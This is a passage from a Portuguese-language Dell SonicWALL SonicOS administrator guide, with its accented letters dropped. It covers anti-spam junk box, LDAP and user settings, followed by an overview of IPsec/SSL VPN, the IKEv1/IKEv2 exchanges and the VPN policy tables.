Use os botes nas partes superior e inferior da lista de resultados da pesquisa para executar
as seguintes tarefas de gerenciamento do repositrio de lixo eletrnico na pgina Anti-spam >
Viso da caixa de lixo eletrnico:
Marcar tudo Marque a caixa de seleo para todas as linhas na pgina. Se houver mais linhas nos
resultados de pesquisa do que o que exibido na pgina atual, somente os resultados na
pgina atual sero selecionados.
Desmarcar tudo Desmarque a caixa de seleo para todas as linhas na pgina. Se houver mais linhas
nos resultados de pesquisa do que o que exibido na pgina atual, somente os
resultados na pgina atual sero desmarcados.
Excluir Exclua permanentemente as mensagens selecionadas a partir do repositrio de lixo

eletrnico.
Liberar Remova as mensagens selecionadas do repositrio de lixo eletrnico e envie-as para os

respectivos destinatrios. A hora e data de entrega sero definidas pelo servidor
Exchange quando cada mensagem for enviada para a caixa de correio do usurio.
Enviar cpia Mantenha as mensagens selecionadas no repositrio de lixo eletrnico e envie cpias
para delas para um usurio.
Exibir Defina o nmero de linhas dos resultados da pesquisa para exibir na pgina. As opes
so 10, 25 e 50 linhas por pgina. Os controles de paginao so fornecidos para
navegar para a primeira pgina, pgina anterior, pgina seguinte e ltima pgina dos
resultados.
Ordenar Clique em qualquer cabealho de coluna na lista de resultados para ordenar os

resultados de acordo com esse campo.

Para gerenciar o repositrio de lixo eletrnico:
Etapa 1 Na lista de resultados, marque a caixa de seleo para as mensagens que voc deseja
gerenciar.
Etapa 2 Para excluir permanentemente as mensagens selecionadas a partir do repositrio de lixo
eletrnico, clique no boto Excluir no incio ou no final da lista.
As mensagens selecionadas so excludas imediatamente. No existe nenhuma caixa de
dilogo de confirmao antes da excluso. Se a excluso for bem-sucedida, exibida uma
notificao em verde no topo da pgina. Se a excluso falhar, a notificao exibida em
vermelho.
Etapa 3 Para remover as mensagens selecionadas do repositrio de lixo eletrnico e envi-las para os
usurios, clique no boto Liberar.
As mensagens so liberadas e enviadas imediatamente. No existe nenhuma caixa de dilogo
de confirmao antes da ao. Se a ao for bem-sucedida, exibida uma notificao em
verde no topo da pgina. Se a ao falhar, a notificao exibida em vermelho.
Etapa 4 Para enviar uma cpia das mensagens selecionadas para um usurio, clique no boto Enviar
cpia para. Digite o endereo de e-mail na caixa de dilogo Enviar cpia para e, em seguida,
clique em Enviar.
Anti-Spam > Configuraes da caixa de lixo eletrnico

A pgina Configuraes da caixa de lixo eletrnico permite que o administrador defina o
perodo de tempo em que as mensagens so armazenadas na caixa de lixo eletrnico antes
de serem excludas e o nmero de mensagens de lixo eletrnico a exibir por pgina. O nmero

de dias para guardar as mensagens na caixa de lixo eletrnico est definido por padro para
15 dias antes da excluso. O nmero de mensagens exibidas por pgina est configurado por
padro para 400 linhas.
Anti-spam > Resumo de lixo eletrnico

O repositrio de lixo eletrnico envia uma mensagem de e-mail para os usurios listando todas
as mensagens que foram colocadas em seu resumo de lixo eletrnico. O resumo de lixo
eletrnico contm um nmero de mensagens bloqueadas (por usurio) e uma lista de e-mails
em quarentena, com os links correspondentes para visualizar e liberar essas mensagens.

Para gerenciar o resumo da caixa de lixo eletrnico:
Etapa 1 Em Configuraes de frequncia, selecione um intervalo de tempo na caixa suspensa

Frequncia de resumos. Os intervalos de tempo incluem nunca, 1 hora, 4 horas, 1 dia, 3 dias,
7 dias e 14 dias. E selecione as opes Hora do dia para enviar resumo e Dia da semana
para enviar resumo para personalizar as datas e horas em que os usurios recebero
notificaes de e-mail. Observe que os usurios individuais podem substituir essas
configuraes.
Etapa 2 Em Configuraes de mensagens, escolha se deseja incluir no resumo da mensagem Todas
as mensagens de lixo eletrnico ou Apenas provvel lixo eletrnico (ocultar lixo eletrnico
evidente). Selecione Idioma de e-mails de resumo na lista suspensa. Escolha entre resumos
Simples ou Grficos.
Etapa 3 Em Configuraes diversas, escolha se as notificaes de resumo da caixa de lixo eletrnico
de e-mails so visualizadas por "clique nico", por visualizao apenas de mensagens ou por
acesso total. Escolha a opo para exigir que os usurios se autentiquem para liberar
mensagens de e-mail. E voc pode limitar as notificaes de resumos da caixa de lixo
eletrnico aos usurios no LDAP.
Etapa 4 Em Outras configuraes, escolha um Endereo de e-mail do qual o resumo enviado
para que o resumo inclua o endereo de e-mail do destinatrio ou insira um endereo de e-
mail designado. Para Nome a partir do qual o resumo enviado, selecione o nome a ser
exibido no cliente de e-mail do usurio final para e-mails de resumo.
Assunto do e-mail
Insira a linha de assunto para o e-mail de resumo da caixa de lixo eletrnico.
URL da exibio do usurio
A URL nesta caixa de texto preenchida automaticamente com base em sua
configurao do servidor. Ele a base de todos os links no e-mail de resumo da caixa
de lixo eletrnico. Teste o link se voc realizar alteraes para garantir conectividade.
Testar este link
Os usurios liberam itens no e-mail de resumo da caixa de lixo eletrnico clicando nos
links do e-mail. Para testar a URL, clique em Testar este link. Se o teste falhar, verifique
se a URL est correta. (Parmetros B, C, D da lista de verificao da instalao)
Etapa 5 Clique no boto Aplicar alteraes.

Anti-spam > Configurao de exibio do usurio
A pgina Configurao de exibio do usurio permite que o administrador selecione e defina
as configuraes que sero visveis para os usurios.
Catlogos de endereos
Para permitir que os usurios visualizem seu prprio catlogo de endereos na barra de
ferramentas de navegao, selecione a barra de ferramentas Catlogos de Endereos na
seo Configurao de exibio do usurio.
Configuraes de download do usurio

Marque a caixa de seleo correspondente para permitir que os usurios faam
download do boto de lixo eletrnico para Outlook da SonicWALL ou para permitir que
os usurios faam download da Anti-Spam Desktop para Outlook e Outlook Express da
SonicWALL na Exibio do usurio.
Configuraes de visualizao de lixo eletrnico em quarentena

Para permitir que os usurios visualizem lixo eletrnico em quarentena, marque a caixa de
seleo Os usurios podem visualizar seu prprio lixo eletrnico em quarentena.
Observe que os usurios designados Administradores tm acesso para visualizar todo o lixo
eletrnico em quarentena de toda a organizao por padro. Para alterar esta opo,
desmarque a caixa de seleo de Administradores.
Aps todas as alteraes necessrias terem sido realizadas, clique no boto Aplicar
alteraes. Para limpar as alteraes realizadas e voltar s configuraes padro, clique no
boto Reverter.

Anti-Spam > Catlogos de endereos
A pgina Catlogos de endereos permite que o administrador determine as listas de
permisses e bloqueios de suas organizaes. A lista uma combinao de remetentes
permitidos e bloqueados das listas da organizao e fornecidas pelo firewall.
Listas de permisses
Para adicionar um remetente lista de permisses corporativas, navegue at a guia
Permisses e, em seguida, clique no boto Adicionar. Ser exibida uma caixa de dilogo onde
precisar selecionar o tipo de lista entre Pessoas, Empresas ou Listas. Depois de selecionar
uma das opes, voc pode inserir o(s) endereo(s) de e-mail no espao fornecido. Clique em
Adicionar para concluir. Os endereos de e-mail sero adicionados lista na pgina
Catlogos de endereos permitidos.
Para excluir um remetente da lista de permisses corporativas, navegue at a guia Permisses

e, em seguida, marque a caixa de seleo junto aos endereos de e-mail que voc deseja
excluir. exibida uma mensagem de xito confirmando a excluso.
Lista de bloqueios

Para adicionar um remetente lista de bloqueios corporativos, navegue at a guia Bloqueios
e, em seguida, clique no boto Adicionar. Ser exibida uma caixa de dilogo onde precisar
selecionar o tipo de lista entre Pessoas e Empresas. Depois de selecionar uma das opes,
voc pode inserir o(s) endereo(s) de e-mail no espao fornecido. Clique em Adicionar para
concluir. Os endereos de e-mail sero adicionados lista na pgina Catlogos de endereos
bloqueados.
Nota Os remetentes adicionados lista de bloqueios corporativos pelo administrador sero

automaticamente bloqueados para todos os usurios e s podem ser excludos pelo
administrador.
Para excluir um remetente da lista de bloqueios corporativos, navegue at a guia Bloqueios e,

em seguida, marque a caixa de seleo junto aos endereos de e-mail que voc deseja excluir.
exibida uma mensagem de xito confirmando a excluso.
Campo de pesquisa
Est disponvel um campo de pesquisa para encontrar rapidamente endereos de e-mail
autorizados e bloqueados. Voc pode acessar esse campo navegando at a guia Permisses
ou at a guia Bloqueios. Alm disso, voc pode filtrar a pesquisa entre o tipo de endereos
(pessoas, empresas ou listas) marcando as caixas de seleo abaixo da barra de pesquisa.
Insira o endereo que voc deseja pesquisar e, em seguida, clique no boto Ir para iniciar a
pesquisa.
Nota A guia Bloqueios filtra somente os endereos por Pessoas e Empresas, enquanto a guia
Permisses filtra os endereos por Pessoas, Empresas e Listas.

Anti-spam > Gerenciar usurios
A pgina Usurios permite que o administrador adicione, remova e gerencie todos os usurios
em servidores globais e LDAP. Para obter mais informaes sobre a configurao LDAP,
consulte Anti-Spam > Configurao LDAP na pgina 820.
Configurao de exibio do usurio

Usar a origem
O campo Usar a origem permite que o administrador selecione o servidor ou origem para
visualizar. Um servidor global estar sempre visvel. Se for adicionado um servidor LDAP, este
tambm estar disponvel na lista suspensa. Selecione o servidor que voc deseja visualizar
e, em seguida, clique no boto Ir.
Localizar todos os usurios na coluna

O campo Localizar todos os usurios na coluna permite que o administrador procure
rapidamente usurios especificando o Nome do usurio ou o E-mail principal. Voc tambm
pode filtrar a pesquisa pelos valores iguais a, iniciando com ou contendo.
Adicionar usurios

Para adicionar um usurio ao servidor global ou LDAP, clique no boto Adicionar. Insira o
Endereo principal do usurio, selecione servidor ao qual o usurio pertence no menu
suspenso Usar origem e, em seguida, insira os Apelidos. Clique em Adicionar para terminar
de adicionar um usurio.
Anti-Spam > Configurao LDAP

A tela Configurao LDAP permite que o administrador defina vrias configuraes especficas
no servidor LDAP.
Servidores LDAP disponveis

Esta seo exibir quaisquer servidores LDAP que foram configurados no firewall.
Adicionar um servidor LDAP
Na seo Servidores LDAP disponveis, clique no boto Adicionar servidor. A seo
Configurao do servidor ir expandir e permitir que o administrador comece a fornecer as
seguintes configuraes para um novo servidor LDAP:
Nome amigvel um nome amigvel para o servidor LDAP.
Nome ou endereo IP do servidor primrio o nome do servidor ou o endereo IP do
servidor LDAP.
Nmero da porta o nmero da porta do servidor LDAP. O nmero da porta padro 389.
Tipo de servidor LDAP escolha na lista suspensa de servidores: Active Directory, Lotus
Domino, Exchange 5.5, Sun ONE iPlanet ou outros.

Tamanho de pgina LDAP o tamanho mximo da pgina no servidor LDAP a consultar.
Requer SSL a seleo desta opo permite que o servidor LDAP exija SSL.
Permitir recomendaes de LDAP a seleo desta opo permite recomendaes de
LDAP.
Na seo Mtodo de autenticao, voc ter de configurar o mtodo de login de LDAP para
usurios. Selecione Ligao annima ou Logon para o mtodo de logon de LDAP e, em
seguida, especifique o Nome de logon e a Senha. Voc tambm pode habilitar a opo
Preencher campos de consulta de LDAP automaticamente ao salvar configurao
marcando a caixa de seleo. Clique em Salvar alteraes para terminar de adicionar um
servidor LDAP.
Nota Voc pode testar as configuraes que definiu clicando no boto Testar logon de LDAP no
canto inferior direito da seo Mtodo de autenticao.
Configurar um servidor LDAP
Na lista de servidores LDAP disponveis, clique no cone Editar . As sees Configurao

do servidor, Painel de consulta de LDAP e Adicionar mapeamentos de LDAP expandem para
edio. A seo Configurao do servidor que se expande ao clicar no cone Editar a mesma
seo que voc configurou ao adicionar um novo servidor LDAP.
Painel de consulta de LDAP
Se voc selecionou a opo Preencher campos de consulta de LDAP automaticamente na
seo Configurao do servidor, o painel de consulta de LDAP ser automaticamente
preenchido com os valores padro.
Se voc no selecionou a opo acima, ser necessrio especificar os valores a seguir para
permitir que os usurios faam logon com xito em sua caixa de lixo eletrnico:

N de diretrio para iniciar a pesquisa especifique um caminho de diretrio LDAP
completo que aponta para um n contendo as informaes de todos os grupos no diretrio.
Filtro especifique um filtro de LDAP para localizar e identificar facilmente usurios e listas
de mala direta no servidor. Neste exemplo, (&(|
(objectClass=group)(objectClass=person)(objectClass=publicFolder))(mail=*))
Atributo de nome de login do usurio especifique o atributo de texto que o usurio usar
como "nome de login". O atributo geralmente aceito para este campo sAMAccountName.
Observe que este campo funciona em sincronia com o campo Filtro e precisa concordar
em ambos os campos se alterado.
Atributo do apelido do e-mail especifique o endereo de e-mail, o ID de funcionrio, o
nmero de telefone ou outro atributo de apelido que ligue um nico usurio a sua caixa de
lixo eletrnico. O nico atributo geralmente aceito para este campo proxyAddresses.
Observe que outros atributos devem ser separados por uma vrgula. Neste exemplo,
proxyAddresses,legacyExchangeDN.
Adicionar mapeamentos de LDAP

Se voc estiver usando um ambiente Microsoft Windows, voc precisar especificar o nome
de domnio NetBIOS. Para localizar o domnio NETBIOS:
1. Efetue login em seu controlador de domnios.
2. Navegue at Iniciar > Todos os programas > Ferramentas administrativas > Domnios
e relacionamentos de confiana do Active Directory.
3. Realce seu domnio na caixa de dilogo Domnios e relacionamentos de confiana do
Active Directory.
4. Clique em Ao. Em seguida, clique em Propriedades. O nome de domnio exibido na
caixa de dilogo Propriedades do domnio, na guia Geral.

5. Adicione o(s) nome(s) de domnio de NetBIOS seo Domnios, separando mltiplos
domnios por uma vrgula.
6. Clique em Salvar alteraes para terminar.
Regras de converso
Em determinados servidores LDAP, como Lotus Domino, alguns endereos de e-mail vlidos
no aparecem no LDAP. A seo Regras de converso altera a forma como o dispositivo Email
Security da Dell SonicWALL interpreta determinados endereos de e-mail, fornecendo uma
forma de mapeamento do endereo de e-mail para o servidor LDAP. Clique no boto Exibir
regras para abrir a caixa de dilogo Mapeamentos de LDAP.
Selecione o servidor LDAP que est usando na lista suspensa e, em seguida, clique em Ir.
Voc pode filtrar a pesquisa tambm com o seguinte:
Mapeamentos de domnio
o domnio adiciona mais mapeamentos de um domnio para outro
substituir por substitui o domnio pelo especificado
tambm adicionar adiciona o segundo domnio lista de domnios vlidos
o caractere do lado esquerdo adiciona mapeamentos de substituio de
caracteres
substituir por substitui o caractere especificado em todos os caracteres
esquerda do sinal "@" no endereo de e-mail
tambm adicionar adiciona um segundo endereo de e-mail lista de
endereos de e-mail vlidos
Clique no boto Adicionar mapeamento para terminar de adicionar as regras de converso.

Anti-spam > Avanado
A pgina Avanado permite que o administrador faa o download de arquivos de registro ou
sistema e configure o nvel de registro.
Fazer download de arquivos de registro/sistema

Voc pode fazer o download de arquivos de registro ou de arquivos de configurao do sistema
no servidor Email Security da SonicWALL. Selecione Tipo de arquivo na lista suspensa para
selecionar o tipo de arquivo para fazer o download. Em seguida, na categoria Escolher
arquivos especficos, voc pode selecionar um ou mais itens especficos.
Depois de selecionar os arquivos, clique em Download para fazer o download do(s) arquivo(s)
para a sua unidade de disco rgido local. Para enviar o(s) arquivo(s) por e-mail, clique no boto
Enviar por e-mail para... e digite o endereo de e-mail do destinatrio na caixa de dilogo
exibida.
Nvel de registro
Voc pode selecionar a quantidade de informaes do relatrio do sistema a armazenar em
seus registros. O nvel de registro 1 fornece a quantidade mxima de informaes de registro,
enquanto o nvel 6 fornece a quantidade mnima. Clique em Aplicar alteraes para salvar as
alteraes realizadas.

Anti-spam > Downloads
A pgina Downloads permite que o administrador faa o download e instale um dos botes de
bloqueio de spam mais recentes da SonicWALL na respectiva rea de trabalho.

Parte 13
VPN
| 827
Captulo 53
Configurando polticas de VPN
VPN > Configuraes

A pgina VPN > Configuraes fornece os recursos para configurar as polticas de VPN.
possvel configurar polticas de VPN site a site e polticas de GroupVPN nessa pgina.
Viso geral sobre VPN

Uma VPN (redes virtuais privadas) fornece uma conexo segura entre dois ou mais
computadores ou redes protegidas pela Internet pblica. Ela fornece a autenticao para
garantir que as informaes estejam indo de/para as partes corretas. Ela fornece segurana
para proteger as informaes de exibio ou de adulteraes na rota.
Antes da inveno de IPsec (Internet Protocol Security) e de SSL (Secure Socket Layer), as
conexes seguras entre redes ou computadores remotos precisavam de uma linha dedicada
ou de um link por satlite. Isso era ambos inflexveis e caros.
Configurando polticas de VPN | 829

Uma VPN cria uma conexo com a confiabilidade e segurana semelhantes, estabelecendo
um tnel seguro atravs da Internet. Como este tnel no uma conexo fsica, mais flexvel
- possvel alter-la a qualquer momento para adicionar mais ns, alterar os ns ou remov-
lo completamente. Ela tambm muito menos dispendiosa, porque utiliza a infraestrutura
existente da Internet.
Tipos de VPN
H dois tipos principais de VPN em uso popular hoje:
VPN IPsec: O IPsec um conjunto de protocolos de segurana na camada de
processamento de pacotes de comunicao de rede. Uma vantagem do IPsec que
arranjos de segurana podem ser tratados sem exigir alteraes nos computadores de
usurios individuais. O SonicOS oferece suporte a criao e o gerenciamento de VPNs
IPsec.
O IPsec oferece duas opes de servio de segurana: O cabealho de autenticao (AH),
que permite essencialmente a autenticao do remetente de dados, e o ESP
(Encapsulating Security Payload), que oferece suporte a autenticao do remetente e a
criptografia de dados tambm. As informaes especficas associadas a cada um desses
servios so inseridas no pacote em um cabealho que segue o cabealho do pacote IP.
SSL VPN: O SSL (Secure Socket Layer) um protocolo para gerenciar a segurana de
uma transmisso de mensagem na Internet, geralmente, por HTTPS. O SSL usa uma
camada de programa localizada entre as camadas HTTP (protocolo de transferncia de
hipertexto) e o TCP (protocolo de controle de transporte) da Internet. O SSL usa o sistema
de criptografia de chave pblica e privada de RSA, que tambm inclui o uso de um
certificado digital. Uma SSL VPN usa SSL para proteger o tnel de VPN.
Uma vantagem da SSL VPN que o SSL foi criado na maioria dos navegadores da Web.
Nenhum hardware ou software de cliente de VPN especial necessrio.
Nota A Dell SonicWALL faz os dispositivos SSL VPN com os quais possvel usar em conjunto
ou independentemente de um dispositivo de segurana de rede da Dell SonicWALL ao
executar o SonicOS. Para obter informaes sobre os dispositivos da Dell SonicWALL SSL
VPN, consulte o site da Dell SonicWALL: http://www.SonicWALL.com/US/products/
Secure_Remote_Access.HTML
Segurana de VPN
Trfego de VPN IPsec protegido em dois estgios:
Autenticao: A primeira fase estabelece a autenticidade do remetente e do destinatrio
do trfego usando uma troca da parte de chave pblica de um par de chaves pblica-
privada. Esta fase dever ser bem-sucedida antes do tnel de VPN poder ser estabelecido.
Criptografia: O trfego no tnel de VPN criptografado, usando um algoritmo de
criptografia, como AES ou 3DES.
A menos que voc usar uma chave manual (que deve ser digitada de forma idntica em cada
n na VPN), a troca de informaes para autenticar os membros da VPN e criptografar/
descriptografar os dados usa o protocolo IKE (Internet Key Exchange) para trocar informaes
de autenticao (chaves) e estabelecer o tnel de VPN. O SonicOS oferece suporte a duas
verses do IKE, verso 1 e verso 2.
IKE verso 1
O IKE verso 1 usa um processo de duas fases para proteger o tnel de VPN.

IKE fase 1 a fase de autenticao. Os ns ou gateways no final do tnel autenticam-se
uns aos outros, trocam chaves de criptografia/descriptografia e estabelecem o tnel
seguro.
IKE fase 2 a fase de negociao. Uma vez autenticado, a dois ns ou gateways
negociam os mtodos de criptografia e verificao de dados (usando uma funo de hash)
para ser usado em dados transmitidos atravs da VPN e negociam o nmero de SAs
(associaes seguras) no tnel e seu tempo de vida antes de solicitar a renegociao das
chaves de criptografia/descriptografia.
IKE fase 1
Em IKE v1, h dois modos de troca de informaes de autenticao: Modo principal e Modo
agressivo.
Modo principal: O n ou o gateway que inicia a VPN consulta o n ou o gateway na
extremidade de recepo e eles trocam mtodos de autenticao, chaves pblicas e
informaes de identidade. Isso geralmente requer seis mensagens para frente e para trs. A
ordem das mensagens de autenticao em Modo principal :
1. O iniciador envia uma lista de algoritmos criptogrficos em que o iniciador oferece suporte.
2. O respondente responde com uma lista de algoritmos criptogrficos suportados.
3. O iniciador envia uma chave pblica (parte de um par de chaves pblica/privada Diffie-
Hellman) para o primeiro algoritmo criptogrfico com suporte mtuo.
4. O respondente responde com a chave pblica para o mesmo algoritmo criptogrfico.
5. O iniciador envia informaes de identidade (geralmente um certificado).
6. O respondente responde com informaes de identidade.
Modo agressivo: Para reduzir o nmero de mensagens trocadas durante a autenticao pela
metade, a negociao de qual algoritmo criptogrfico usar eliminada. O iniciador prope um
algoritmo e o respondente responde se ele oferece suporte a esse algoritmo:
1. O iniciador prope um algoritmo criptogrfico para usar e enviar sua chave pblica.
2. O respondente responde com uma chave pblica e uma prova de identidade.
3. O iniciador envia uma prova de identificao. Aps a autenticao, o tnel de VPN
estabelecido com duas SAs, uma de cada n para o outro.
IKE fase 2
Em IKE fase 2, as duas partes negociam o tipo de segurana a ser usado, quais mtodos de
criptografia usar para o trfego atravs do tnel (se necessrio) e negociam a vida til do tnel
antes que recriao de chave seja necessria.
Os dois tipos de segurana para pacotes individuais so:
ESP (Encryption Secured Payload), no qual a parte de dados de cada pacote
criptografada usando um protocolo negociado entre as partes.
AH (Cabealho de autenticao), no qual o cabealho de cada pacote contm
informaes de autenticao para garantir que as informaes sejam autenticadas e que
no tenham sido violadas. Nenhuma criptografia usada para os dados com o AH.
O SonicOS oferece suporte para os seguintes mtodos de criptografia para trfego atravs da
VPN.
DES
3DES
AES-128
AES-192
AES-256

possvel encontrar mais informaes sobre o IKE v1 nas trs especificaes que definem
inicialmente IKE, RFC 2407, RFC 2408 e RFC 2409, disponvel na Web em:
http://www.FAQs.org/RFCs/rfc2407.HTML
IKE verso 2
O IKE verso 2 um protocolo mais recente para negociar e estabelecer associaes de

segurana. Recursos de IKEv2 aprimorados de segurana, uma arquitetura simplificada e
suporte aprimorado para usurios remotos.
IKEv2 o tipo de proposta padro para novas polticas de VPN.
Os gateways secundrio so suportados com o IKEv2.
O IKEv2 no compatvel com o IKE v1. Se usar o IKEv2, todos os ns na VPN devero usar
o IKEv2 para estabelecer os tneis.
O DHCP sobre a VPN no oferece suporte no IKEv2.
O IKEv2 tem as seguintes vantagens sobre IKEv1:
Mais seguro
Mais confivel
Mais simples
Mais rpido
Extensvel
Menos trocas de mensagens para estabelecer conexes
Suporte de autenticao de EAP
Suporte MOBIKE
Transversal NAT embutido
Keep Alive habilitado como padro
O IKEv2 oferece suporte a alocao de endereo IP e EAP para habilitar diferentes mtodos
de autenticao e cenrios de acesso remoto. Usar o IKEv2 reduz consideravelmente o
nmero de trocas de mensagens necessrias para estabelecer um Modo principal SA sobre
IKE v1, enquanto estiver sendo mais seguro e flexvel que Modo agressivo IKE v1. Isso reduz
os atrasos durante a recriao de chave. Visto que as VPNS aumentam para incluir mais e
mais tneis entre vrios ns ou gateways, o IKEv2 reduz o nmero de SAs necessrios por
tnel, reduzindo, assim, a largura de banda necessria e as despesas de manuteno do
sistema.
As SAs em IKEv2 so chamadas de SAs filhas e podem ser criadas, modificadas e excludas
independentemente a qualquer momento durante a vida do tnel de VPN.
Inicializao e Autenticao no IKE v2

O IKE v2 inicializa um tnel de VPN com um par de trocas de mensagens (dois pares de
mensagem/resposta).
Inicializar a comunicao: O primeiro par de mensagens (IKE_SA_INIT) negocia
algoritmos de criptografia, valores de uso nico de troca (valores aleatrios gerados e
enviados para proteo contra mensagens repetidas) e executa uma troca de chave
pblica.
a. O iniciador envia uma lista de algoritmos de criptografia com suporte, chaves pblica
e um valor de uso nico.
b. O respondente envia o algoritmo de criptografia selecionado, a chave pblica, um
nmero de uso nico e uma solicitao de autenticao.

Autenticar: O segundo par de mensagens (IKE_AUTH) autentica as mensagens anteriores,
as identidades de troca e os certificados e estabelece a primeira CHILD_SA. As partes
dessas mensagens so criptografadas e a integridade protegida com chaves
estabelecidas por meio de troca IKE_SA_INIT, portanto, as identidades so ocultas contra
bisbilhoteiros e todos os campos em todas as mensagens so autenticados.
a. O iniciador envia a prova de identidade, como um segredo compartilhado ou um
certificado e uma solicitao para estabelecer uma SA filha.
b. O respondente envia a prova de identidade correspondente e conclui a negociao de
uma SA filha.
Negociando SAs no IKE v2

Essa troca consiste em um nico par de solicitao/resposta e era conhecida como uma troca
de fase 2 no IKE v1. Pode ser iniciada pelas extremidades da SA aps a concluso das as
trocas iniciais.
Todas as mensagens aps a troca inicial so protegidas criptograficamente usando as chaves
negociadas e os algoritmos criptogrficos nas duas primeiras mensagens da troca IKE.
O ponto de extremidade pode iniciar uma troca CREATE_CHILD_SA, portanto, nesta seo o
termo "iniciador" refere-se ao ponto de extremidade que inicia essa troca.
1. O iniciador envia uma oferta SA filha e, se os dados deverem ser criptografados, o mtodo
de criptografia e a chave pblica.
2. O respondente envia a oferta SA filha aceita e, se as informaes de criptografia tiverem
sido includas, uma chave pblica.
Nota possvel encontrar mais informaes sobre o IKE v2 na especificao, RFC 4306,
disponvel na Web em: http://www.ietf.org/RFC/rfc4306.txt
Para obter informaes sobre como configurar as VPNs no SonicOS, consulte:

Configurando VPNs no SonicOS na pgina 833
Configurando VPNs para o IPv6 na pgina 836
Configurando polticas do GroupVPN na pgina 838
Configuraes VPN site a site na pgina 845
Criando polticas de VPN site a site na pgina 846
Controle de regra de acesso VPN adicionada automaticamente na pgina 862
Configurando VPNs no SonicOS

A VPN da SonicWALL, com base na implementao de VPN IPsec padro de mercado, fornece
uma soluo fcil de configurar e segura para conectar usurios mveis, trabalhadores a
distncia, escritrios remotos e parceiros atravs da Internet. Os usurios mveis,
trabalhadores a distncia e outros usurios remotos com banda larga (DSL ou cabo) ou acesso
Internet dial-up podem facilmente e com segurana acessar os recursos de rede com o Dell
SonicWALL Global VPN Client e o GroupVPN no firewall. As redes de escritrios remotos
podem se conectar de forma segura rede usando conexes de VPN site a site que permitem
conexes de VPN de rede a rede.
Nota Para obter mais informaes sobre o Dell SonicWALL Global VPN Client, consulte o Guia
do administrador do Dell SonicWALL Global VPN Client.

O GroupVPN fornece provisionamento de poltica de VPN automtica para o Global VPN
Client. O recurso de GroupVPN no dispositivo de segurana de rede da Dell SonicWALL e no
Global VPN Client simplificam drasticamente o gerenciamento e implantao de VPN.
Utilizando a tecnologia de provisionamento de poltica de cliente, defina as polticas de VPN
para usurios do Global VPN Client. Essas informaes de poltica so baixadas
automaticamente do firewall (Gateway de VPN) para o Global VPN Client, polpando os
usurios remotos da carga de conexes de provisionamento de VPN.
possvel configurar os tneis de GroupVPN ou de VPN de site a site usando a Interface de
gerenciamento. possvel definir at quatro polticas de GroupVPN, uma para cada zona.
Tambm possvel criar vrias VPNs de site a site. O nmero mximo de polticas que
possvel adicionar depende do modelo de SonicWALL.
Nota Os usurios remotos devem ter explicitamente permisso de acesso aos recursos de rede
nas pginas Usurios > Usurios locais ou Usurios > Grupos locais. Ao configurar
usurios locais ou grupos locais, a guia Acesso de VPN afetar a capacidade de clientes
remotos que usam o GVC que se conecta ao GroupVPN; tambm afetar os usurios
remotos que usam o NetExtender e os marcadores SSL VPN Virtual Office ao acessar os
recursos da rede. Para permitir que os usurios do GVC, NetExtender ou Virtual Office
acessem um recurso da rede, os objetos ou grupos de endereo da rede devem ser
adicionados lista de permisses na guia Acesso VPN.
Configuraes globais de VPN

A seo Configuraes de VPN Global da pgina VPN > Configuraes exibe as seguintes
informaes:
Habilitar VPN deve ser selecionada para permitir polticas de VPN por meio de polticas
de segurana da Dell SonicWALL.
Identificador de firewall exclusivo - o valor padro o nmero de srie do firewall.
possvel alterar o Identificador e us-lo para configurar tneis de VPN.
Polticas de VPN
Todas as polticas de VPN existentes so exibidas na tabela Polticas de VPN. Cada entrada
exibe as seguintes informaes:
Nome: Exibe o nome padro ou o nome de poltica de VPN definido pelo usurio.
Gateway: Exibe o endereo IP do firewall remoto. Se 0.0.0.0 for usado, nenhum gateway
ser exibido.
Destinos: Exibe os endereos IP das redes de destino.
Conjunto de criptografias: Exibe o tipo de criptografia usada para a poltica de VPN.
Habilitar: Marcar a caixa de seleo permite a poltica de VPN. Desmarcar a caixa de
seleo a desabilita.
Configurar: Clicar no cone Editar permite editar a poltica de VPN. Clicar no cone Excluir
permite excluir a poltica de VPN. As polticas de GroupVPN predefinidas no podem
ser excludas, portanto, os cones Excluir estaro esmaecidos. As polticas de GroupVPN
tambm tm um cone Disco para exportar a configurao de polticas de VPN como um
arquivo para a instalao local por SonicWALL Global VPN Clients.
O nmero de polticas de VPN definidas, polticas habilitadas e o nmero mximo de Polticas
permitidas exibido abaixo da tabela. possvel definir at quatro polticas de GroupVPN,
uma para cada zona. Essas polticas de GroupVPN so listadas, por padro, na tabela
Polticas de VPN como GroupVPN de WAN , GroupVPN de LAN , GroupVPN de DMZ e
GroupVPN de WLAN. Clicar no cone de edio na coluna Configurar para o GroupVPN
exibida a janela Poltica de VPN para configurar a poltica de GroupVPN.

Abaixo da tabela Polticas de VPN esto os seguintes botes:
Adicionar - acessa a janela Poltica de VPN para configurar polticas de VPN site a site.
Excluir - exclui a caixa (marcada) selecionada antes do nome da poltica de VPN na coluna
Nome. No possvel excluir as polticas de GroupVPN.
Excluir tudo - exclui todas as polticas de VPN na tabela Polticas de VPN, exceto as
polticas de GroupVPN padro.
Navegando e classificando as entradas de polticas de VPN
A tabela Polticas de VPN fornece fcil paginao para a visualizao de um grande nmero
de polticas de VPN. possvel navegar um grande nmero de polticas de VPN listadas na
tabela Polticas de VPN usando a barra de controle de navegao localizada na parte superior
direita da tabela Polticas de VPN. A barra de controle de navegao inclui quatro botes. O
boto mais esquerda exibe a primeira pgina da tabela. O boto mais direita exibe a ltima
pgina. Os botes de seta interiores para a esquerda e para a direita movem a pgina anterior
ou seguinte, respectivamente.
possvel inserir o nmero da poltica (o nmero listado antes do nome da poltica na coluna
N Nome) no campo Itens para mover para uma poltica de VPN especfica. A configurao de
Tneis de VPN ativos no momento

Uma lista de tneis de VPN ativos no momento exibida nesta seo. A tabela lista o nome
da Poltica de VPN, os endereos IP da LAN local e os endereos IP de rede de destino remoto,
bem como o endereo IP de gateway de mesmo nvel.
Clique no boto Renegociar para forar o Cliente de VPN a renegociar o tnel de VPN.
Exibindo estatsticas de tnel de VPN
Na tabela Tneis de VPN ativos atualmente, clique no cone Estatsticas na linha para um tnel
exibir as estatsticas nesse tnel. O cone Estatsticas de tnel de VPN exibe:
Hora de criao: A data e hora em que o tnel veio em existncia.
Tnel vlido at: O momento em que o tnel expira e forado a renegociar.
Pacotes de entrada: O nmero de pacotes recebidos desse tnel.
Pacotes de sada: O nmero de pacotes enviados a partir desse tnel.
Bytes de entrada: O nmero de bytes recebidos desse tnel.
Bytes de sada: O nmero de bytes enviados desse tnel.
Pacotes fragmentados de entrada: O nmero de pacotes fragmentados recebidos desse
tnel.
Pacotes fragmentados de sada: O nmero de pacotes fragmentados enviados desse tnel.
Para obter informaes detalhadas sobre como configurar VPNs no SonicOS, consulte:
Configurando polticas do GroupVPN na pgina 838
